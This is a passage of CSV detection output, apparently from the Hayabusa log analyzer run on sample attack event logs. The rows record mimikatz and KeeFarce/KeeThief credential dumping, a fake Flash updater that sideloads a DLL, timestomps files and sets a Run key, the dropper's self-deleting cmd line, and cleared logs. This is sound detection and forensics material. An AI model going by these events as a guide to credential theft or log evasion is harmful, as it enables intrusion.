C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:01:35.720 +00:00,IEWIN7,10,high,,Process Access_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 1200 | Src PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Tgt PID: 472 | Tgt PGUID: 365ABB72-29B3-5CB9-0000-001087490000",rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:01:35.720 +00:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:01:49.961 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\wlanapi.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1624 | PGUID: 365ABB72-AB28-5CB8-0000-001025060100 | Hash: 
SHA1=31E713AFCF973171D9A3B0B616F4726CD3CFE621,MD5=837E870DBDEE3D19122C833389D81CC9,SHA256=4C4410B103A80D9502E6842033BBDA2952C219824DCCA75EEB8265C94A53FBC4,IMPHASH=6C6D0BFAB9C996952B5E81BA61DB929E",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:03:03.321 +00:00,IEWIN7,11,medium,,File Created_Sysmon Alert,"technique_id=T1187,technique_name=Forced Authentication | Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | PID: 1388 | PGUID: 365ABB72-AB28-5CB8-0000-0010F2E20000",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:03:03.441 +00:00,IEWIN7,11,medium,,File Created_Sysmon Alert,"technique_id=T1187,technique_name=Forced Authentication | Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\HTools (vboxsrv) (D).lnk | Process: C:\Windows\Explorer.EXE | PID: 1388 | PGUID: 365ABB72-AB28-5CB8-0000-0010F2E20000",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-27 15:57:25.868 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\Downloads\Flash_update.exe | Process: C:\Windows\Explorer.EXE | PID: 2772 | PGUID: 365ABB72-7ACC-5CC4-0000-0010B2470300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:25.868 +00:00,IEWIN7,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:27.087 
+00:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 944 | PGUID: 365ABB72-7AB0-5CC4-0000-0010C5BE0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.368 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | Process: C:\Users\IEUser\Downloads\Flash_update.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf4be | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=B4E581F173F782A2F1DA5D29C95946EE500EB2D0,MD5=42893ADBC36605EC79B5BD610759947E,SHA256=1A061C74619DE6AF8C02CBA0FA00754BDD9E3515C0E08CAD6350C7ADFC8CDD5B,IMPHASH=40BEC1A4A3BCB7D3089B5E1532386613",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.368 +00:00,IEWIN7,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.587 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Windows\System32\winmm.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: 
SHA1=41905C387FA657D91DA8A743ABC04B6C11A38B52,MD5=D5AEFAD57C08349A4393D987DF7C715D,SHA256=C36A45BC2448DF30CD17BD2F8A17FC196FAFB685612CACCEB22DC7B58515C201,IMPHASH=1A7210F2C9930AF9B51025300C67DA77",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.650 +00:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-04 16:29:27.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.634 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.650 +00:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-04 16:29:27.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.634 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.650 +00:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll.url | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-05 17:50:28.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.650 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.650 +00:00,IEWIN7,11,info,,File Created,Path: 
C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.650 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.650 +00:00,IEWIN7,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.837 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: ? | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.837 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: ? 
| Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.837 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.837 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | LID: 0xf4be | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.853 
+00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=4E14894860034FEFBAB41CFE9A763D8061D19EF9,MD5=2D8FB1F82724CF542CD2E3A5E041FB52,SHA256=ECE29E4AF4B33C02DAFAC24748A9C125B057E39455ACF3C45464DB36BFE74881,IMPHASH=9599F61759CDFD742AFA0B8EC24B5599",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.853 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Windows\System32\winmm.dll | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=41905C387FA657D91DA8A743ABC04B6C11A38B52,MD5=D5AEFAD57C08349A4393D987DF7C715D,SHA256=C36A45BC2448DF30CD17BD2F8A17FC196FAFB685612CACCEB22DC7B58515C201,IMPHASH=1A7210F2C9930AF9B51025300C67DA77",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.868 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? 
| Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.868 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.868 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? 
| Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.884 +00:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1060,technique_name=Registry Run Keys / Start Folder | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows\CurrentVersion\Run\360v: C:\Users\IEUser\AppData\Roaming\svchost.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.884 +00:00,IEWIN7,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.931 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2992 | Src PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Tgt PID: 3076 | Tgt PGUID: 365ABB72-7C01-5CC4-0000-00105C5C0C00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.931 
+00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe /A | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" | LID: 0xf4be | PID: 3076 | PGUID: 365ABB72-7C01-5CC4-0000-00105C5C0C00 | Hash: SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.931 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:54.134 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | LID: 0xf4be | PID: 3188 | PGUID: 365ABB72-7C02-5CC4-0000-0010FD6E0C00 | Hash: SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:54.165 +00:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 
365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 18:47:00.046 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: KeeFarce.exe | Process: C:\Users\Public\KeeFarce.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xffa8 | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Hash: SHA1=C622268A9305BA27C78ECB5FFCC1D43B019847B5,MD5=07D86CD24E11C1B8F0C2F2029F9D3466,SHA256=F0D5C8E6DF82A7B026F4F0412F8EDE11A053185675D965215B1FFBBC52326516,IMPHASH=D94F14D149DD5809F1B4D1C38A1B4E40",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-27 18:47:00.046 +00:00,IEWIN7,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-27 18:47:00.062 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"creddump - keefarce HKTL | Image: C:\Users\Public\BootstrapDLL.dll | Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 2364 | PGUID: 365ABB72-A201-5CC4-0000-00104F500800 | Hash: SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-27 18:47:00.062 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"creddump - keefarce HKTL | Image: C:\Users\Public\BootstrapDLL.dll | Process: C:\Users\Public\KeeFarce.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Hash: SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-27 18:47:00.062 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Users\Public\KeeFarce.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 1288 | Src PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-27 18:47:00.124 +00:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\Public\KeeFarce.exe | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-27 18:55:04.710 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 2856 | Src PGUID: 365ABB72-A512-5CC4-0000-0010C05E1B00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-27 18:55:04.710 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-27 18:55:04.710 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-27 18:55:04.980 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 2856 | Src PGUID: 365ABB72-A512-5CC4-0000-0010C05E1B00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-27 18:55:04.980 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-27 18:55:04.980 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-27 19:27:55.274 +00:00,IEWIN7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx +2019-04-27 21:04:25.733 +00:00,DESKTOP-JR78RLP,104,high,Evas,System Log File Cleared,User: jwrig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-27 21:04:32.373 +00:00,DESKTOP-JR78RLP,7040,medium,Evas,Event Log Service Startup Type Changed To Disabled,Old Setting: auto start | New Setting: disabled,rules/hayabusa/default/alerts/System/7040_EventLogServiceStartupDisabled.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-28 16:29:42.988 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\Win32\mimikatz.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: 